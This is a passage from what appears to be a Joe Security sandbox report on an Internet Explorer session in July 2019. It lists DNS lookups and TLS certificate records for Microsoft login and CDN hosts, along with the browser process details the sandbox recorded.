Jul 9, 2019 03:22:40.320421934 CEST 192.168.2.5 8.8.8.8 0x6892 Standard query (0)
statics-uhf-wus.akamaized.net
A (IP address) IN (0x0001)
Jul 9, 2019 03:22:40.335621119 CEST 192.168.2.5 8.8.8.8 0x4067 Standard query (0)
ajax.aspnetcdn.com
A (IP address) IN (0x0001)
Jul 9, 2019 03:22:40.351214886 CEST 192.168.2.5 8.8.8.8 0x2817 Standard query (0)
img-prod-cms-rt-microsoft-com.akamaized.net
A (IP address) IN (0x0001)
Jul 9, 2019 03:22:44.350034952 CEST 192.168.2.5 8.8.8.8 0x7a7f Standard query (0)
assets.onestore.ms
A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Jul 9, 2019 03:22:18.072875023 CEST
8.8.8.8 192.168.2.5 0x647f No error (0) secure.aadcdn.microsoftonline-p.com
secure.aadcdn.microsoftonline-p.com.edgekey.net
CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:18.120796919 CEST
8.8.8.8 192.168.2.5 0xc682 No error (0) code.jquery.com cds.s5x3j6q5.hwcdn.net CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:33.498903036 CEST
8.8.8.8 192.168.2.5 0xf793 No error (0) secure.aadcdn.microsoftonline-p.com
secure.aadcdn.microsoftonline-p.com.edgekey.net
CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:34.648251057 CEST
8.8.8.8 192.168.2.5 0x96be No error (0) login.microsoftonline.com
prda.aadg.msidentity.com CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:34.648251057 CEST
8.8.8.8 192.168.2.5 0x96be No error (0) prda.aadg.msidentity.com
www.prdtm.aadg.akadns.net
CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:34.837987900 CEST
8.8.8.8 192.168.2.5 0x4f22 No error (0) aadcdn.msauth.net
aadcdnoriginwus2.azureedge.net
CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:36.197906971 CEST
8.8.8.8 192.168.2.5 0xed42 No error (0) login.msa.msidentity.com
lgin.msa.trafficmanager.net
CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:36.628884077 CEST
8.8.8.8 192.168.2.5 0x19d5 No error (0) signup.live.com account.msa.msidentity.com
CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:36.628884077 CEST
8.8.8.8 192.168.2.5 0x19d5 No error (0) account.msa.msidentity.com
account.msa.akadns6.net CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:36.628884077 CEST
8.8.8.8 192.168.2.5 0x19d5 No error (0) prda.aadg.msidentity.com
www.prdtm.aadg.windows.net.nsatc.net
CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:37.475236893 CEST
8.8.8.8 192.168.2.5 0x9b8 No error (0) acctcdn.msauth.net
acctcdn.trafficmanager.net
CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:37.475236893 CEST
8.8.8.8 192.168.2.5 0x9b8 No error (0) cs1227.wpc.alphacdn.net
192.229.221.185 A (IP address) IN (0x0001)
Jul 9, 2019 03:22:39.078263044 CEST
8.8.8.8 192.168.2.5 0x64b1 No error (0) aa-hip-prod.southcentralus.cloudapp.azure.com
104.215.74.84 A (IP address) IN (0x0001)
Jul 9, 2019 03:22:40.362567902 CEST
8.8.8.8 192.168.2.5 0x6892 No error (0) statics-uhf-wus.akamaized.net
a849.dscg2.akamai.net CNAME (Canonical name)
IN (0x0001)
DNS Queries
DNS Answers
Copyright Joe Security LLC 2019 Page 43 of 47
Jul 9, 2019 03:22:40.366381884 CEST
8.8.8.8 192.168.2.5 0x4067 No error (0) ajax.aspnetcdn.com
mscomajax.vo.msecnd.net
CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:40.390448093 CEST
8.8.8.8 192.168.2.5 0x2817 No error (0) img-prod-cms-rt-microsoft-com.akamaized.net
a1449.dscg2.akamai.net CNAME (Canonical name)
IN (0x0001)
Jul 9, 2019 03:22:44.407598972 CEST
8.8.8.8 192.168.2.5 0x7a7f No error (0) assets.onestore.ms
assets.onestore.ms.akadns.net
CNAME (Canonical name)
IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Timestamp Source IPSourcePort Dest IP
DestPort Subject Issuer
NotBefore
NotAfter
JA3 SSL ClientFingerprint JA3 SSL Client Digest
Jul 9, 2019 03:22:37.642251968 CEST
192.229.221.185 443 192.168.2.5 49725 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016
Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024
771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
9e10692f1b7f78228b2d4e424db3a98c
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Fri May 20 14:53:03 CEST 2016
Mon May 20 14:53:03 CEST 2024
Jul 9, 2019 03:22:37.643217087 CEST
192.229.221.185 443 192.168.2.5 49727 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016
Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024
771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
9e10692f1b7f78228b2d4e424db3a98c
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Fri May 20 14:53:03 CEST 2016
Mon May 20 14:53:03 CEST 2024
Jul 9, 2019 03:22:37.643553019 CEST
192.229.221.185 443 192.168.2.5 49729 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016
Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024
771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
9e10692f1b7f78228b2d4e424db3a98c
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Fri May 20 14:53:03 CEST 2016
Mon May 20 14:53:03 CEST 2024
Jul 9, 2019 03:22:37.643855095 CEST
192.229.221.185 443 192.168.2.5 49728 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016
Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024
771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
9e10692f1b7f78228b2d4e424db3a98c
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Fri May 20 14:53:03 CEST 2016
Mon May 20 14:53:03 CEST 2024
HTTPS Packets
Copyright Joe Security LLC 2019 Page 44 of 47
Code Manipulations
Statistics
Behavior
• iexplore.exe
• iexplore.exe
Click to jump to process
System Behavior
Jul 9, 2019 03:22:37.646456957 CEST
192.229.221.185 443 192.168.2.5 49730 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016
Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024
771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
9e10692f1b7f78228b2d4e424db3a98c
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Fri May 20 14:53:03 CEST 2016
Mon May 20 14:53:03 CEST 2024
Jul 9, 2019 03:22:37.646611929 CEST
192.229.221.185 443 192.168.2.5 49726 CN=prod-identitycdnsan.msauth.net CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Mon Dec 17 23:12:34 CET 2018 Fri May 20 14:53:03 CEST 2016
Thu Dec 17 23:12:34 CET 2020 Mon May 20 14:53:03 CEST 2024
771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
9e10692f1b7f78228b2d4e424db3a98c
CN=Microsoft IT TLS CA 5, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US
CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Fri May 20 14:53:03 CEST 2016
Mon May 20 14:53:03 CEST 2024
Timestamp Source IPSourcePort Dest IP
DestPort Subject Issuer
NotBefore
NotAfter
JA3 SSL ClientFingerprint JA3 SSL Client Digest
Analysis Process: iexplore.exe PID: 4576 Parent PID: 692Analysis Process: iexplore.exe PID: 4576 Parent PID: 692
General
Copyright Joe Security LLC 2019 Page 45 of 47
File ActivitiesFile Activities
Registry ActivitiesRegistry Activities
Start time: 03:22:14
Start date: 09/07/2019
Path: C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase: 0x7ff7033a0000
File size: 823560 bytes
MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
Key Path Completion CountSourceAddress Symbol
Key Path Name Type Data Completion CountSourceAddress Symbol
Key Path Name Type Old Data New Data Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Registry ActivitiesRegistry Activities
Start time: 03:22:15
Start date: 09/07/2019
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4576 CREDAT:17410 /prefetch:2
Imagebase: 0x1080000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
Key Path Name Type Old Data New Data Completion CountSourceAddress Symbol
Analysis Process: iexplore.exe PID: 4256 Parent PID: 4576Analysis Process: iexplore.exe PID: 4256 Parent PID: 4576
General
Copyright Joe Security LLC 2019 Page 46 of 47
Disassembly
Copyright Joe Security LLC 2019 Page 47 of 47